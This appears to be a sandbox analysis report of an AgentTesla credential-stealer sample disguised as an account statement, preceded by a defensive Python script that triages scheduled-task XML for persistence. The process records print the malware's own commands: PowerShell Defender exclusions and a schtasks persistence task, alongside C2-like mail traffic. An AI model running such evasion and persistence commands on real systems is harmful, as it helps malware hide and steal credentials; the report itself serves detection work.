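The two entries above are the same 1,601-byte Task Scheduler definition, written once by the original executable and once by the copy in AppData\Roaming: an enabled LogonTrigger for the interactive user, a Principal that runs at LeastPrivilege with an InteractiveToken, and a RegistrationInfo date of 2014-10-25, a decade before the sample's own PE time stamp, which marks the XML as a template carried inside the binary rather than a task the system registered at run time. Two details matter when such a file is parsed on a victim host: the report types it as ASCII text although its declaration says UTF-16, so a parser that trusts the declaration fails, and the preview is cut off inside Settings, so the Actions block is not on this page. The Python below is an added example and not part of the Joe Sandbox report or the sample: it decodes the file by the bytes actually present, extracts author, triggers, principal and commands, and flags the persistence pattern. The embedded task XML is constructed for the example; its RegistrationInfo, Triggers and Principals copy the preview, while the Settings and Actions blocks and the Exec path C:\Users\user\AppData\Roaming\example.exe are assumptions.

```python
"""Triage a Windows Task Scheduler XML file of the kind this report shows being
dropped: who registered it, what fires it, what it runs and with which privilege,
plus flags for the persistence pattern (logon trigger, binary in a user-writable
directory, registration date older than the binary itself)."""
import datetime
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# PE TimeDateStamp of the report's sample: 0x6622708E = Fri Apr 19 13:24:30 2024 UTC.
BINARY_TIMESTAMP = datetime.datetime(2024, 4, 19, 13, 24, 30)

# Constructed task file, NOT the report's dropped file. RegistrationInfo, Triggers and
# Principals copy the report's preview; Settings, Actions and the Exec path are assumed.
SAMPLE_TASK_XML = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>user-PC\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>user-PC\user</UserId>
    </LogonTrigger>
    <RegistrationTrigger>
      <Enabled>false</Enabled>
    </RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>user-PC\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <StartWhenAvailable>true</StartWhenAvailable>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\user\AppData\Roaming\example.exe</Command>
    </Exec>
  </Actions>
</Task>
"""

# Path fragments an unprivileged user can write to; a scheduled binary under one of
# these is the usual shape of user-level malware persistence.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\tmp\\", "\\programdata\\",
                 "\\users\\public\\", "\\downloads\\")


def user_writable_path(path: str) -> bool:
    p = path.strip('"').lower()
    return any(marker in p for marker in USER_WRITABLE)


def load_task_xml(raw: bytes) -> ET.Element:
    """Decode by the bytes actually present (UTF-16 only if a BOM is there), then strip
    the XML declaration so a wrong encoding= attribute cannot derail the parser."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        text = raw.decode("utf-16")
    else:
        text = raw.decode("utf-8", errors="replace")
    text = re.sub(r"^\s*<\?xml[^>]*\?>", "", text)
    return ET.fromstring(text.strip())


def _text(node, path):
    found = node.find(path, NS) if node is not None else None
    return found.text.strip() if found is not None and found.text else None


def triage_task(raw: bytes, binary_time: datetime.datetime) -> dict:
    root = load_task_xml(raw)
    triggers_node = root.find("t:Triggers", NS)
    triggers = []
    for trig in (list(triggers_node) if triggers_node is not None else []):
        kind = trig.tag.split("}")[-1]                       # drop the namespace
        enabled = (_text(trig, "t:Enabled") or "true").lower() == "true"   # absent = enabled
        triggers.append((kind, enabled))
    commands = [_text(ex, "t:Command") for ex in root.findall("t:Actions/t:Exec", NS)]
    reg_date = _text(root, "t:RegistrationInfo/t:Date")
    registered = (datetime.datetime.strptime(reg_date[:19], "%Y-%m-%dT%H:%M:%S")
                  if reg_date else None)
    return {
        "author": _text(root, "t:RegistrationInfo/t:Author"),
        "registered": registered,
        "triggers": triggers,
        "run_level": _text(root, "t:Principals/t:Principal/t:RunLevel"),
        "logon_type": _text(root, "t:Principals/t:Principal/t:LogonType"),
        "commands": commands,
        "logon_persistence": any(k == "LogonTrigger" and on for k, on in triggers),
        "runs_from_user_writable_path": any(user_writable_path(c) for c in commands if c),
        # A task "registered" years before its binary was compiled is a bundled template.
        "registration_predates_binary": registered is not None and registered < binary_time,
    }


if __name__ == "__main__":
    for key, value in triage_task(SAMPLE_TASK_XML.encode("ascii"), BINARY_TIMESTAMP).items():
        print(f"{key}: {value}")
```

The same function accepts a genuine UTF-16 task file (BOM present) without change; the truncated-fraction date parse avoids the seven-digit fractional seconds that the Task Scheduler writes and that older fromisoformat() implementations reject.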
                                            Process:C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):1031168
                                            Entropy (8bit):7.3124238980608
                                            Encrypted:false
                                            SSDEEP:24576:0f7y6rwJVCUv7MQehWtnEYVe5+2brHkfbwHo7m:xj/DMV4tebHYbwGm
                                            MD5:25E87D17F0C864FFDC217D43C82CC36C
                                            SHA1:AECD0FF1A25D22ACE6AB1C9650589CA916CABF3F
                                            SHA-256:37FDA41FDB04917E4C0DA2880B51BA07E959D53A31A93A9B47785A5BE8807BD7
                                            SHA-512:D1809508E78D48D398E48602A381C7E3BD45295A7B5BBD25403BF1EDD351B495CB85C4E2076099B97401E1D41DFD36670540D7431CF8C8C5CA574F96147C304D
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 37%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p"f..............0.............".... ........@.. ....................... ............@.....................................O.......................................T............................................ ............... ..H............text...(.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........N...W..........T...............................................^..}.....(.......(.....*&..(.....*...0..+.........,..{.......+....,...{....o........( ....*..0..=.........s!...}.....s"...}.....s#...}.....($.....{........s%...o&.....{.....s'...o(.....{.....o).....{....r...po*.....{.... o....<s+...o,.....{.....o-.....{....r...po......{.... -....js%...o&.....{....r:..po*.....{.....K..s+...o,.....{.....o-.....{....rD..po......{.....o/.....{...........s0...o1.....{.....o2..
                                            Process:C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:false
                                            Preview:[ZoneTransfer]....ZoneId=0
                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.3124238980608
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Windows Screen Saver (13104/52) 0.07%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            File name:UPDATED SSTATEMENT OF ACCOUNT.exe
                                            File size:1'031'168 bytes
                                            MD5:25e87d17f0c864ffdc217d43c82cc36c
                                            SHA1:aecd0ff1a25d22ace6ab1c9650589ca916cabf3f
                                            SHA256:37fda41fdb04917e4c0da2880b51ba07e959d53a31a93a9b47785a5be8807bd7
                                            SHA512:d1809508e78d48d398e48602a381c7e3bd45295a7b5bbd25403bf1edd351b495cb85c4e2076099b97401e1d41dfd36670540d7431cf8c8c5ca574f96147c304d
                                            SSDEEP:24576:0f7y6rwJVCUv7MQehWtnEYVe5+2brHkfbwHo7m:xj/DMV4tebHYbwGm
                                            TLSH:7225E23D0CBE1A3B9176D2AACFE88567F040D47B39126D7A94D383958346A9379C313E
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p"f..............0.............".... ........@.. ....................... ............@................................
                                            Icon Hash:00928e8e8686b000
                                            Entrypoint:0x4fd022
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x6622708E [Fri Apr 19 13:24:30 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                            Instruction
                                            jmp dword ptr [00402000h]
                                            Name | Virtual Address | Virtual Size | Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0xfcfcf | 0x4f | .text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xfe000 | 0x5f0 | .rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x100000 | 0xc | .reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0xfb30c | 0x54 | .text
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                            .text | 0x2000 | 0xfb028 | 0xfb200 | 1ddb7808f4082a882dedb84b7807dba3 | False | 0.7935384519661524 | data | 7.318017102591194 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc | 0xfe000 | 0x5f0 | 0x600 | 72ad7b120d9e542282d9119eb6a3d2c6 | False | 0.439453125 | data | 4.195996894871083 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc | 0x100000 | 0xc | 0x200 | bcee61620cddc0ba58106cba59a9209c | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                            RT_VERSION | 0xfe090 | 0x360 | data | | | 0.4363425925925926
                                            RT_MANIFEST | 0xfe400 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                            DLL | Import
                                            mscoree.dll | _CorExeMain
                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                            Apr 19, 2024 17:14:00.019898891 CEST | 49674 | 443 | 192.168.2.6 | 173.222.162.64
                                            Apr 19, 2024 17:14:00.022052050 CEST | 49673 | 443 | 192.168.2.6 | 173.222.162.64
                                            Apr 19, 2024 17:14:00.285495996 CEST | 49672 | 443 | 192.168.2.6 | 173.222.162.64
                                            Apr 19, 2024 17:14:04.222758055 CEST | 49711 | 80 | 192.168.2.6 | 208.95.112.1
                                            Apr 19, 2024 17:14:04.339114904 CEST | 80 | 49711 | 208.95.112.1 | 192.168.2.6
                                            Apr 19, 2024 17:14:04.342086077 CEST | 49711 | 80 | 192.168.2.6 | 208.95.112.1
                                            Apr 19, 2024 17:14:04.356827021 CEST | 49711 | 80 | 192.168.2.6 | 208.95.112.1
                                            Apr 19, 2024 17:14:04.475250959 CEST | 80 | 49711 | 208.95.112.1 | 192.168.2.6
                                            Apr 19, 2024 17:14:04.519870996 CEST | 49711 | 80 | 192.168.2.6 | 208.95.112.1
                                            Apr 19, 2024 17:14:05.480058908 CEST | 49712 | 587 | 192.168.2.6 | 135.181.124.14
                                            Apr 19, 2024 17:14:06.582465887 CEST | 49712 | 587 | 192.168.2.6 | 135.181.124.14
                                            Apr 19, 2024 17:14:07.591602087 CEST | 49714 | 80 | 192.168.2.6 | 208.95.112.1
                                            Apr 19, 2024 17:14:07.709563017 CEST | 80 | 49714 | 208.95.112.1 | 192.168.2.6
                                            Apr 19, 2024 17:14:07.709660053 CEST | 49714 | 80 | 192.168.2.6 | 208.95.112.1
                                            Apr 19, 2024 17:14:07.710444927 CEST | 49714 | 80 | 192.168.2.6 | 208.95.112.1
                                            Apr 19, 2024 17:14:07.834146976 CEST | 80 | 49714 | 208.95.112.1 | 192.168.2.6
                                            Apr 19, 2024 17:14:07.879276037 CEST | 49714 | 80 | 192.168.2.6 | 208.95.112.1
                                            Apr 19, 2024 17:14:08.355324030 CEST | 49711 | 80 | 192.168.2.6 | 208.95.112.1
                                            Apr 19, 2024 17:14:08.503844976 CEST | 49715 | 587 | 192.168.2.6 | 135.181.124.14
                                            Apr 19, 2024 17:14:09.539673090 CEST | 49715 | 587 | 192.168.2.6 | 135.181.124.14
                                            Apr 19, 2024 17:14:09.676163912 CEST | 49673 | 443 | 192.168.2.6 | 173.222.162.64
                                            Apr 19, 2024 17:14:09.707372904 CEST | 49674 | 443 | 192.168.2.6 | 173.222.162.64
                                            Apr 19, 2024 17:14:09.987772942 CEST | 49672 | 443 | 192.168.2.6 | 173.222.162.64
                                            Apr 19, 2024 17:14:11.302365065 CEST | 443 | 49706 | 173.222.162.64 | 192.168.2.6
                                            Apr 19, 2024 17:14:11.302675962 CEST | 49706 | 443 | 192.168.2.6 | 173.222.162.64
                                            Apr 19, 2024 17:14:11.551305056 CEST | 49715 | 587 | 192.168.2.6 | 135.181.124.14
                                            Apr 19, 2024 17:14:15.566844940 CEST | 49715 | 587 | 192.168.2.6 | 135.181.124.14
                                            Apr 19, 2024 17:14:21.602996111 CEST | 49706 | 443 | 192.168.2.6 | 173.222.162.64
                                            Apr 19, 2024 17:14:21.604033947 CEST | 49706 | 443 | 192.168.2.6 | 173.222.162.64
                                            Apr 19, 2024 17:14:21.609772921 CEST | 49720 | 443 | 192.168.2.6 | 173.222.162.64
                                            Apr 19, 2024 17:14:21.609818935 CEST | 443 | 49720 | 173.222.162.64 | 192.168.2.6
                                            Apr 19, 2024 17:14:21.609991074 CEST | 49720 | 443 | 192.168.2.6 | 173.222.162.64
                                            Apr 19, 2024 17:14:21.615868092 CEST | 49720 | 443 | 192.168.2.6 | 173.222.162.64
                                            Apr 19, 2024 17:14:21.615890026 CEST | 443 | 49720 | 173.222.162.64 | 192.168.2.6
                                            Apr 19, 2024 17:14:21.755851030 CEST | 443 | 49706 | 173.222.162.64 | 192.168.2.6
                                            Apr 19, 2024 17:14:21.756606102 CEST | 443 | 49706 | 173.222.162.64 | 192.168.2.6
                                            Apr 19, 2024 17:14:21.948985100 CEST | 443 | 49720 | 173.222.162.64 | 192.168.2.6
                                            Apr 19, 2024 17:14:21.949059963 CEST | 49720 | 443 | 192.168.2.6 | 173.222.162.64
                                            Apr 19, 2024 17:14:22.147676945 CEST | 49720 | 443 | 192.168.2.6 | 173.222.162.64
                                            Apr 19, 2024 17:14:22.147701979 CEST | 443 | 49720 | 173.222.162.64 | 192.168.2.6
                                            Apr 19, 2024 17:14:22.148266077 CEST | 443 | 49720 | 173.222.162.64 | 192.168.2.6
                                            Apr 19, 2024 17:14:22.148329973 CEST | 49720 | 443 | 192.168.2.6 | 173.222.162.64
                                            Apr 19, 2024 17:14:22.150605917 CEST | 49720 | 443 | 192.168.2.6 | 173.222.162.64
                                            Apr 19, 2024 17:14:22.150636911 CEST | 443 | 49720 | 173.222.162.64 | 192.168.2.6
                                            Apr 19, 2024 17:14:22.150854111 CEST | 49720 | 443 | 192.168.2.6 | 173.222.162.64
                                            Apr 19, 2024 17:14:22.196127892 CEST | 443 | 49720 | 173.222.162.64 | 192.168.2.6
                                            Apr 19, 2024 17:14:22.587204933 CEST | 443 | 49720 | 173.222.162.64 | 192.168.2.6
                                            Apr 19, 2024 17:14:22.587266922 CEST | 49720 | 443 | 192.168.2.6 | 173.222.162.64
                                            Apr 19, 2024 17:14:22.587819099 CEST | 443 | 49720 | 173.222.162.64 | 192.168.2.6
                                            Apr 19, 2024 17:14:22.587872028 CEST | 49720 | 443 | 192.168.2.6 | 173.222.162.64
                                            Apr 19, 2024 17:14:22.587892056 CEST | 443 | 49720 | 173.222.162.64 | 192.168.2.6
                                            Apr 19, 2024 17:14:22.587943077 CEST | 49720 | 443 | 192.168.2.6 | 173.222.162.64
                                            Apr 19, 2024 17:14:23.566780090 CEST | 49715 | 587 | 192.168.2.6 | 135.181.124.14
                                            Apr 19, 2024 17:14:40.957426071 CEST | 80 | 49714 | 208.95.112.1 | 192.168.2.6
                                            Apr 19, 2024 17:14:40.957660913 CEST | 49714 | 80 | 192.168.2.6 | 208.95.112.1
                                            Apr 19, 2024 17:14:58.504637003 CEST | 49714 | 80 | 192.168.2.6 | 208.95.112.1
                                            Apr 19, 2024 17:14:58.622822046 CEST | 80 | 49714 | 208.95.112.1 | 192.168.2.6
                                            Apr 19, 2024 17:15:39.770505905 CEST | 49704 | 80 | 192.168.2.6 | 199.232.210.172
                                            Apr 19, 2024 17:15:39.874782085 CEST | 80 | 49704 | 199.232.210.172 | 192.168.2.6
                                            Apr 19, 2024 17:15:39.874823093 CEST | 80 | 49704 | 199.232.210.172 | 192.168.2.6
                                            Apr 19, 2024 17:15:39.874918938 CEST | 49704 | 80 | 192.168.2.6 | 199.232.210.172
                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                            Apr 19, 2024 17:14:04.097760916 CEST | 63331 | 53 | 192.168.2.6 | 1.1.1.1
                                            Apr 19, 2024 17:14:04.202157974 CEST | 53 | 63331 | 1.1.1.1 | 192.168.2.6
                                            Apr 19, 2024 17:14:05.348422050 CEST | 52458 | 53 | 192.168.2.6 | 1.1.1.1
                                            Apr 19, 2024 17:14:05.479351997 CEST | 53 | 52458 | 1.1.1.1 | 192.168.2.6
                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                            Apr 19, 2024 17:14:04.097760916 CEST | 192.168.2.6 | 1.1.1.1 | 0x2403 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                                            Apr 19, 2024 17:14:05.348422050 CEST | 192.168.2.6 | 1.1.1.1 | 0x95e0 | Standard query (0) | mail.tabcoeng.com | A (IP address) | IN (0x0001) | false
                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                            Apr 19, 2024 17:14:04.202157974 CEST | 1.1.1.1 | 192.168.2.6 | 0x2403 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                            Apr 19, 2024 17:14:05.479351997 CEST | 1.1.1.1 | 192.168.2.6 | 0x95e0 | No error (0) | mail.tabcoeng.com | | 135.181.124.14 | A (IP address) | IN (0x0001) | false
                                            Apr 19, 2024 17:14:20.796916008 CEST | 1.1.1.1 | 192.168.2.6 | 0x573e | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                                            Apr 19, 2024 17:14:20.796916008 CEST | 1.1.1.1 | 192.168.2.6 | 0x573e | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.211.108 | A (IP address) | IN (0x0001) | false
                                            Apr 19, 2024 17:14:21.364387989 CEST | 1.1.1.1 | 192.168.2.6 | 0x6cbe | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                            Apr 19, 2024 17:14:21.364387989 CEST | 1.1.1.1 | 192.168.2.6 | 0x6cbe | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                                            Apr 19, 2024 17:15:21.811800957 CEST | 1.1.1.1 | 192.168.2.6 | 0x7da0 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                            Apr 19, 2024 17:15:21.811800957 CEST | 1.1.1.1 | 192.168.2.6 | 0x7da0 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                                            • ip-api.com
                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            0 | 192.168.2.6 | 49711 | 208.95.112.1 | 80 | 3392 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Apr 19, 2024 17:14:04.356827021 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                                            Host: ip-api.com
                                            Connection: Keep-Alive
                                            Apr 19, 2024 17:14:04.475250959 CEST | 174 | IN | HTTP/1.1 200 OK
                                            Date: Fri, 19 Apr 2024 15:14:03 GMT
                                            Content-Type: text/plain; charset=utf-8
                                            Content-Length: 5
                                            Access-Control-Allow-Origin: *
                                            X-Ttl: 60
                                            X-Rl: 44
                                            Data Raw: 74 72 75 65 0a
                                            Data Ascii: true


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            1 | 192.168.2.6 | 49714 | 208.95.112.1 | 80 | 4548 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Apr 19, 2024 17:14:07.710444927 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                                            Host: ip-api.com
                                            Connection: Keep-Alive
                                            Apr 19, 2024 17:14:07.834146976 CEST | 174 | IN | HTTP/1.1 200 OK
                                            Date: Fri, 19 Apr 2024 15:14:07 GMT
                                            Content-Type: text/plain; charset=utf-8
                                            Content-Length: 5
                                            Access-Control-Allow-Origin: *
                                            X-Ttl: 60
                                            X-Rl: 44
                                            Data Raw: 74 72 75 65 0a
                                            Data Ascii: true


                                            Target ID:0
                                            Start time:17:14:01
                                            Start date:19/04/2024
                                            Path:C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe"
                                            Imagebase:0xd10000
                                            File size:1'031'168 bytes
                                            MD5 hash:25E87D17F0C864FFDC217D43C82CC36C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2142116748.000000000509F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2142116748.000000000509F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:2
                                            Start time:17:14:02
                                            Start date:19/04/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe"
                                            Imagebase:0x410000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:3
                                            Start time:17:14:02
                                            Start date:19/04/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:17:14:02
                                            Start date:19/04/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe"
                                            Imagebase:0x410000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:5
                                            Start time:17:14:02
                                            Start date:19/04/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:6
                                            Start time:17:14:02
                                            Start date:19/04/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpC678.tmp"
                                            Imagebase:0x4b0000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:7
                                            Start time:17:14:02
                                            Start date:19/04/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:8
                                            Start time:17:14:02
                                            Start date:19/04/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                            Imagebase:0xbd0000
                                            File size:262'432 bytes
                                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2160120971.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2160120971.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2156023579.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2156023579.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2160120971.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:9
                                            Start time:17:14:04
                                            Start date:19/04/2024
                                            Path:C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe
                                            Imagebase:0x160000
                                            File size:1'031'168 bytes
                                            MD5 hash:25E87D17F0C864FFDC217D43C82CC36C
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2180777401.0000000004510000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2180777401.0000000004510000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
